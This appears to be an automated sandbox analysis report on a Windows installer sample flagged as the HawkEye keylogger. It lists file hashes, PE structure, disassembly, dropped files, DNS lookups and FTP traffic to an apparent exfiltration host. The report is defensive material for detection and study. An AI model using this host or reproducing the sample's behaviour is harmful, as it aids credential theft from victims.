                                                                                                                                                      SHA-512:357312AAB5AF3D6AF26365A523C4E966BA87F071BF997EF6258CD79769F35E0C33F1F1893677883B7B06EC31D76042A4A97134C5857AD1D068A2373BCE53DD09
                                                                                                                                                      Malicious:true
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................9...........8.........................'..........Rich............................PE..L....*b.................n..........1.............@.....................................................................................................................T..............................@............................................text....l.......n.................. ..`.rdata...O.......P...r..............@..@.data...@/..........................@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                      C:\Users\user\AppData\Roaming\pid.txt

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\pjavpo.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):4
                                                                                                                                                      Entropy (8bit):2.0
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:IVn:IV
                                                                                                                                                      MD5:41F860E3B7F548ABC1F8B812059137BF
                                                                                                                                                      SHA1:7C7254019CF52A71DF18839B3C433D2DC377F24B
                                                                                                                                                      SHA-256:3E8AB67CE1B66389C3AE94F9C8F8AFDEB70B46A33640554F352868F99D2F5616
                                                                                                                                                      SHA-512:DFF577DDF17B55B4CBAAB526411CFD6AB279ACBEFFA619136DEF4AE7B6013211411C8EBEFF348C74A2250731555DDFB25E9E3A6ADA2361FFB54B7123152A096B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview:6720

                                                                                                                                                      C:\Users\user\AppData\Roaming\pidloc.txt

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\pjavpo.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):44
                                                                                                                                                      Entropy (8bit):4.135821824148036
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:oNt+kiE2J5xAIMCn:oNwkn23fxn
                                                                                                                                                      MD5:526D4450D1F50E31763D5C10E90212F1
                                                                                                                                                      SHA1:EF6D7779EC7A0A27279D22D59A8D6617C4A76531
                                                                                                                                                      SHA-256:88DBE49BC55658678298111BA729F8EEACD11A5DCA55FBD2D4717FAE1C70F2E9
                                                                                                                                                      SHA-512:8421F429DF8875FA392190FF085E1B9C0CA285E86467AC84A662441A7D393ECFDAB6CE8A9523CD849647EDAF1A424E6C0196F41E95AF75EFF86AB3ACBE8E3FC6
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview:C:\Users\user\AppData\Local\Temp\pjavpo.exe

                                                                                                                                                      Static File Info

                                                                                                                                                      General

                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                      Entropy (8bit):7.953294197966189
                                                                                                                                                      TrID:
                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                                                                                      • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                      File name:TGQfHfehsY.exe
                                                                                                                                                      File size:663994
                                                                                                                                                      MD5:9b8ec9e094676d88b02f038f318afd86
                                                                                                                                                      SHA1:65f99e529982f1c1a5cf9eb59f60edfeecdf2eec
                                                                                                                                                      SHA256:54fa4651e925e0fd845ca5652d57a010c26e4ab799211b8d3299cbb7dec35ae8
                                                                                                                                                      SHA512:adda29b5ad3a05f9d34ba4a033cc400d9d45cf82887ac292f7174b3853a2d0edddecee939f32ab784e4c2e4cc58631e7bb5137d353546f5024cb7a402e4bd4b8
                                                                                                                                                      SSDEEP:12288:GQJXYVHSW04C0lbXeur5Du1R3biE7h/j5F2Tpt/nGw:sVHVC0lbXUGEBjn27n
                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................\...........0.....

                                                                                                                                                      File Icon

                                                                                                                                                      Icon Hash:b2a88c96b2ca6a72

                                                                                                                                                      Static PE Info

                                                                                                                                                      General

                                                                                                                                                      Entrypoint:0x4030e3
                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                      Digitally signed:false
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                                                      DLL Characteristics:
                                                                                                                                                      Time Stamp:0x48EFCDCD [Fri Oct 10 21:49:01 2008 UTC]
                                                                                                                                                      TLS Callbacks:
                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                      OS Version Major:4
                                                                                                                                                      OS Version Minor:0
                                                                                                                                                      File Version Major:4
                                                                                                                                                      File Version Minor:0
                                                                                                                                                      Subsystem Version Major:4
                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                      Import Hash:7fa974366048f9c551ef45714595665e

                                                                                                                                                      Entrypoint Preview

                                                                                                                                                      Instruction
                                                                                                                                                      sub esp, 00000180h
                                                                                                                                                      push ebx
                                                                                                                                                      push ebp
                                                                                                                                                      push esi
                                                                                                                                                      xor ebx, ebx
                                                                                                                                                      push edi
                                                                                                                                                      mov dword ptr [esp+18h], ebx
                                                                                                                                                      mov dword ptr [esp+10h], 00409158h
                                                                                                                                                      xor esi, esi
                                                                                                                                                      mov byte ptr [esp+14h], 00000020h
                                                                                                                                                      call dword ptr [00407030h]
                                                                                                                                                      push 00008001h
                                                                                                                                                      call dword ptr [004070B0h]
                                                                                                                                                      push ebx
                                                                                                                                                      call dword ptr [0040727Ch]
                                                                                                                                                      push 00000008h
                                                                                                                                                      mov dword ptr [0042EC18h], eax
                                                                                                                                                      call 00007F2BEC7525C8h
                                                                                                                                                      mov dword ptr [0042EB64h], eax
                                                                                                                                                      push ebx
                                                                                                                                                      lea eax, dword ptr [esp+34h]
                                                                                                                                                      push 00000160h
                                                                                                                                                      push eax
                                                                                                                                                      push ebx
                                                                                                                                                      push 00428F90h
                                                                                                                                                      call dword ptr [00407158h]
                                                                                                                                                      push 0040914Ch
                                                                                                                                                      push 0042E360h
                                                                                                                                                      call 00007F2BEC75227Fh
                                                                                                                                                      call dword ptr [004070ACh]
                                                                                                                                                      mov edi, 00434000h
                                                                                                                                                      push eax
                                                                                                                                                      push edi
                                                                                                                                                      call 00007F2BEC75226Dh
                                                                                                                                                      push ebx
                                                                                                                                                      call dword ptr [0040710Ch]
                                                                                                                                                      cmp byte ptr [00434000h], 00000022h
                                                                                                                                                      mov dword ptr [0042EB60h], eax
                                                                                                                                                      mov eax, edi
                                                                                                                                                      jne 00007F2BEC74FAACh
                                                                                                                                                      mov byte ptr [esp+14h], 00000022h
                                                                                                                                                      mov eax, 00434001h
                                                                                                                                                      push dword ptr [esp+14h]
                                                                                                                                                      push eax
                                                                                                                                                      call 00007F2BEC751D60h
                                                                                                                                                      push eax
                                                                                                                                                      call dword ptr [0040721Ch]
                                                                                                                                                      mov dword ptr [esp+1Ch], eax
                                                                                                                                                      jmp 00007F2BEC74FB05h
                                                                                                                                                      cmp cl, 00000020h
                                                                                                                                                      jne 00007F2BEC74FAA8h
                                                                                                                                                      inc eax
                                                                                                                                                      cmp byte ptr [eax], 00000020h
                                                                                                                                                      je 00007F2BEC74FA9Ch
                                                                                                                                                      cmp byte ptr [eax], 00000022h
                                                                                                                                                      mov byte ptr [eax+eax+00h], 00000000h

                                                                                                                                                      Rich Headers

                                                                                                                                                      Programming Language:
                                                                                                                                                      • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                                      Data Directories

                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x74b00xb4.rdata
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x370000x900.rsrc
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                      Sections

                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                      .text0x10000x5b680x5c00False0.67722486413data6.48746502716IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                      .rdata0x70000x129c0x1400False0.4337890625data5.04904254867IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                      .data0x90000x25c580x400False0.58203125data4.76995537906IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                      .ndata0x2f0000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                      .rsrc0x370000x9000xa00False0.4078125data3.93441125971IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                      Resources

                                                                                                                                                      NameRVASizeTypeLanguageCountry
                                                                                                                                                      RT_ICON0x371900x2e8dataEnglishUnited States
                                                                                                                                                      RT_DIALOG0x374780x100dataEnglishUnited States
                                                                                                                                                      RT_DIALOG0x375780x11cdataEnglishUnited States
                                                                                                                                                      RT_DIALOG0x376980x60dataEnglishUnited States
                                                                                                                                                      RT_GROUP_ICON0x376f80x14dataEnglishUnited States
                                                                                                                                                      RT_MANIFEST0x377100x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                                                                                      Imports

                                                                                                                                                      DLLImport
                                                                                                                                                      KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, SetFileTime, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetTempPathA
                                                                                                                                                      USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                                                                                                      GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                                                                                                      SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                                                                                                      ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                                                                                                      COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                                      ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                                                      VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                                                                                                      Possible Origin

                                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                                      EnglishUnited States

                                                                                                                                                      Network Behavior

                                                                                                                                                      Snort IDS Alerts

                                                                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                      03/11/22-11:57:06.388212TCP2020410ET TROJAN HawkEye Keylogger FTP4978221192.168.2.466.70.204.222

                                                                                                                                                      Network Port Distribution

                                                                                                                                                      TCP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Mar 11, 2022 11:56:39.498601913 CET4977180192.168.2.4104.16.155.36
                                                                                                                                                      Mar 11, 2022 11:56:39.516087055 CET8049771104.16.155.36192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:56:39.516308069 CET4977180192.168.2.4104.16.155.36
                                                                                                                                                      Mar 11, 2022 11:56:39.517868042 CET4977180192.168.2.4104.16.155.36
                                                                                                                                                      Mar 11, 2022 11:56:39.534893990 CET8049771104.16.155.36192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:56:39.541863918 CET8049771104.16.155.36192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:56:39.595161915 CET49772443192.168.2.4104.16.154.36
                                                                                                                                                      Mar 11, 2022 11:56:39.595216036 CET44349772104.16.154.36192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:56:39.595309019 CET49772443192.168.2.4104.16.154.36
                                                                                                                                                      Mar 11, 2022 11:56:39.638482094 CET4977180192.168.2.4104.16.155.36
                                                                                                                                                      Mar 11, 2022 11:56:39.898576975 CET49772443192.168.2.4104.16.154.36
                                                                                                                                                      Mar 11, 2022 11:56:39.898622036 CET44349772104.16.154.36192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:56:39.952605009 CET44349772104.16.154.36192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:56:39.952747107 CET49772443192.168.2.4104.16.154.36
                                                                                                                                                      Mar 11, 2022 11:56:39.955806017 CET49772443192.168.2.4104.16.154.36
                                                                                                                                                      Mar 11, 2022 11:56:39.955833912 CET44349772104.16.154.36192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:56:39.956285000 CET44349772104.16.154.36192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:56:40.138490915 CET49772443192.168.2.4104.16.154.36
                                                                                                                                                      Mar 11, 2022 11:56:40.278337002 CET49772443192.168.2.4104.16.154.36
                                                                                                                                                      Mar 11, 2022 11:56:40.319250107 CET44349772104.16.154.36192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:56:40.319345951 CET44349772104.16.154.36192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:56:40.319412947 CET44349772104.16.154.36192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:56:40.319422007 CET49772443192.168.2.4104.16.154.36
                                                                                                                                                      Mar 11, 2022 11:56:40.319453001 CET44349772104.16.154.36192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:56:40.319523096 CET49772443192.168.2.4104.16.154.36
                                                                                                                                                      Mar 11, 2022 11:56:40.319535971 CET44349772104.16.154.36192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:56:40.319560051 CET44349772104.16.154.36192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:56:40.319622040 CET49772443192.168.2.4104.16.154.36
                                                                                                                                                      Mar 11, 2022 11:56:40.319641113 CET44349772104.16.154.36192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:56:40.319730997 CET44349772104.16.154.36192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:56:40.319794893 CET49772443192.168.2.4104.16.154.36
                                                                                                                                                      Mar 11, 2022 11:56:40.319796085 CET44349772104.16.154.36192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:56:40.319816113 CET44349772104.16.154.36192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:56:40.319879055 CET49772443192.168.2.4104.16.154.36
                                                                                                                                                      Mar 11, 2022 11:56:40.319895029 CET44349772104.16.154.36192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:56:40.320029020 CET44349772104.16.154.36192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:56:40.320101023 CET49772443192.168.2.4104.16.154.36
                                                                                                                                                      Mar 11, 2022 11:56:40.335566044 CET49772443192.168.2.4104.16.154.36
                                                                                                                                                      Mar 11, 2022 11:57:05.140227079 CET4977180192.168.2.4104.16.155.36
                                                                                                                                                      Mar 11, 2022 11:57:05.157907963 CET8049771104.16.155.36192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:57:05.158040047 CET4977180192.168.2.4104.16.155.36
                                                                                                                                                      Mar 11, 2022 11:57:05.174319029 CET4978221192.168.2.466.70.204.222
                                                                                                                                                      Mar 11, 2022 11:57:05.287482023 CET214978266.70.204.222192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:57:05.287642002 CET4978221192.168.2.466.70.204.222
                                                                                                                                                      Mar 11, 2022 11:57:05.401681900 CET214978266.70.204.222192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:57:05.416121006 CET4978221192.168.2.466.70.204.222
                                                                                                                                                      Mar 11, 2022 11:57:05.527772903 CET214978266.70.204.222192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:57:05.527828932 CET214978266.70.204.222192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:57:05.528053999 CET4978221192.168.2.466.70.204.222
                                                                                                                                                      Mar 11, 2022 11:57:05.654520988 CET214978266.70.204.222192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:57:05.654768944 CET4978221192.168.2.466.70.204.222
                                                                                                                                                      Mar 11, 2022 11:57:05.766429901 CET214978266.70.204.222192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:57:05.767116070 CET4978221192.168.2.466.70.204.222
                                                                                                                                                      Mar 11, 2022 11:57:05.878653049 CET214978266.70.204.222192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:57:05.878947020 CET4978221192.168.2.466.70.204.222
                                                                                                                                                      Mar 11, 2022 11:57:05.990483999 CET214978266.70.204.222192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:57:05.990739107 CET4978221192.168.2.466.70.204.222
                                                                                                                                                      Mar 11, 2022 11:57:06.102324009 CET214978266.70.204.222192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:57:06.102615118 CET4978221192.168.2.466.70.204.222
                                                                                                                                                      Mar 11, 2022 11:57:06.214400053 CET214978266.70.204.222192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:57:06.281152010 CET4978359592192.168.2.466.70.204.222
                                                                                                                                                      Mar 11, 2022 11:57:06.387773037 CET595924978366.70.204.222192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:57:06.387960911 CET4978359592192.168.2.466.70.204.222
                                                                                                                                                      Mar 11, 2022 11:57:06.388211966 CET4978221192.168.2.466.70.204.222
                                                                                                                                                      Mar 11, 2022 11:57:06.499972105 CET214978266.70.204.222192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:57:06.500601053 CET4978359592192.168.2.466.70.204.222
                                                                                                                                                      Mar 11, 2022 11:57:06.502582073 CET4978359592192.168.2.466.70.204.222
                                                                                                                                                      Mar 11, 2022 11:57:06.503002882 CET4978359592192.168.2.466.70.204.222
                                                                                                                                                      Mar 11, 2022 11:57:06.607103109 CET595924978366.70.204.222192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:57:06.608611107 CET214978266.70.204.222192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:57:06.608766079 CET4978221192.168.2.466.70.204.222
                                                                                                                                                      Mar 11, 2022 11:57:06.608994961 CET595924978366.70.204.222192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:57:06.609338045 CET595924978366.70.204.222192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:57:06.609569073 CET4978359592192.168.2.466.70.204.222

                                                                                                                                                      UDP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Mar 11, 2022 11:56:39.170579910 CET6075853192.168.2.48.8.8.8
                                                                                                                                                      Mar 11, 2022 11:56:39.190047979 CET53607588.8.8.8192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:56:39.458843946 CET6064753192.168.2.48.8.8.8
                                                                                                                                                      Mar 11, 2022 11:56:39.479759932 CET53606478.8.8.8192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:56:39.571732998 CET6490953192.168.2.48.8.8.8
                                                                                                                                                      Mar 11, 2022 11:56:39.593318939 CET53649098.8.8.8192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:57:05.145423889 CET5406953192.168.2.48.8.8.8
                                                                                                                                                      Mar 11, 2022 11:57:05.172800064 CET53540698.8.8.8192.168.2.4

                                                                                                                                                      DNS Queries

                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                      Mar 11, 2022 11:56:39.170579910 CET192.168.2.48.8.8.80x9e4dStandard query (0)63.155.11.0.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                                                                                                                      Mar 11, 2022 11:56:39.458843946 CET192.168.2.48.8.8.80xfce7Standard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                                                                                                      Mar 11, 2022 11:56:39.571732998 CET192.168.2.48.8.8.80x1ec8Standard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                                                                                                      Mar 11, 2022 11:57:05.145423889 CET192.168.2.48.8.8.80xd252Standard query (0)ftp.manchutimefashion.comA (IP address)IN (0x0001)

                                                                                                                                                      DNS Answers

                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                      Mar 11, 2022 11:56:39.190047979 CET8.8.8.8192.168.2.40x9e4dName error (3)63.155.11.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
                                                                                                                                                      Mar 11, 2022 11:56:39.479759932 CET8.8.8.8192.168.2.40xfce7No error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                                                                                                      Mar 11, 2022 11:56:39.479759932 CET8.8.8.8192.168.2.40xfce7No error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                                                                                                      Mar 11, 2022 11:56:39.593318939 CET8.8.8.8192.168.2.40x1ec8No error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                                                                                                      Mar 11, 2022 11:56:39.593318939 CET8.8.8.8192.168.2.40x1ec8No error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                                                                                                      Mar 11, 2022 11:57:05.172800064 CET8.8.8.8192.168.2.40xd252No error (0)ftp.manchutimefashion.com66.70.204.222A (IP address)IN (0x0001)

                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                      • whatismyipaddress.com

                                                                                                                                                      HTTP Packets

                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                      0192.168.2.449772104.16.154.36443C:\Users\user\AppData\Local\Temp\pjavpo.exe
                                                                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                      1192.168.2.449771104.16.155.3680C:\Users\user\AppData\Local\Temp\pjavpo.exe
                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                      Mar 11, 2022 11:56:39.517868042 CET1151OUTGET / HTTP/1.1
                                                                                                                                                      Host: whatismyipaddress.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Mar 11, 2022 11:56:39.541863918 CET1152INHTTP/1.1 301 Moved Permanently
                                                                                                                                                      Date: Fri, 11 Mar 2022 10:56:39 GMT
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Cache-Control: max-age=3600
                                                                                                                                                      Expires: Fri, 11 Mar 2022 11:56:39 GMT
                                                                                                                                                      Location: https://whatismyipaddress.com/
                                                                                                                                                      Set-Cookie: __cf_bm=rE07xrxDQ3gu5160rFCOZBo1xcY2ARBHMkXyiq.YvX4-1646996199-0-AX39iZhctemb+yAyetr/r3JPZ9wotRMzUuDaAqFqyu9phi5ADWZTJw7ik1WKJR3/bbU0y/Dzu/Oc4rpFB6LmM6E=; path=/; expires=Fri, 11-Mar-22 11:26:39 GMT; domain=.whatismyipaddress.com; HttpOnly
                                                                                                                                                      Server: cloudflare
                                                                                                                                                      CF-RAY: 6ea3c3c70b5a5c4a-FRA
                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 0


                                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                      0192.168.2.449772104.16.154.36443C:\Users\user\AppData\Local\Temp\pjavpo.exe
                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                      2022-03-11 10:56:40 UTC0OUTGET / HTTP/1.1
                                                                                                                                                      Host: whatismyipaddress.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      2022-03-11 10:56:40 UTC0INHTTP/1.1 403 Forbidden
                                                                                                                                                      Date: Fri, 11 Mar 2022 10:56:40 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                      Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                      Set-Cookie: __cf_bm=0fu62l9a9_o52ZpSiY3B2Ubbqf8OPYGmRmWYhvH38y0-1646996200-0-AfArknz4ODut5S1R3Wyrv/QQodqXd6I1PPLa+MPUvKGZ6LT0rq7co6gxFQbkOapzHcyoZ6cbSHNSxTJdVa3eLOE=; path=/; expires=Fri, 11-Mar-22 11:26:40 GMT; domain=.whatismyipaddress.com; HttpOnly; Secure
                                                                                                                                                      Server: cloudflare
                                                                                                                                                      CF-RAY: 6ea3c3cbc8a66955-FRA
                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
